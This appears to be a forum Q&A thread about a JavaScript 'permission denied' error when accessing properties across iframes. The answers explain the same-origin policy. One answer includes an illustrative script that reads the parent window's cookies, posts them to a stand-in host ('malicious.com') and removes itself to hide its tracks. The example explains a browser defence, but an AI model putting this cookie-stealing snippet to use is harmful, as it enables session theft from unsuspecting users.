javascript permission denied to access property

Question

I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}

Answer 1

The code below

<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>

Throws

Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.

The protocols must match (eg: the main window and the iframe protocols must be either file: or http: to name a couple).

The domains must match (eg: the main window and the iframe domains must be example.com)

The ports must match (eg: the main window and the iframe ports must be 80 or 8080)

---

This is to protect users from code being executed from malicious sites, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.

An example of malicious JavaScript code:

<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious.com/maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>

Answer 2

Any JavaScript that attempts to access properties of a document on a different domain (e.g. in an iframe element) is in violation of the security concept called the same origin policy.

In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site – a combination of scheme, hostname, and port number1 – to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.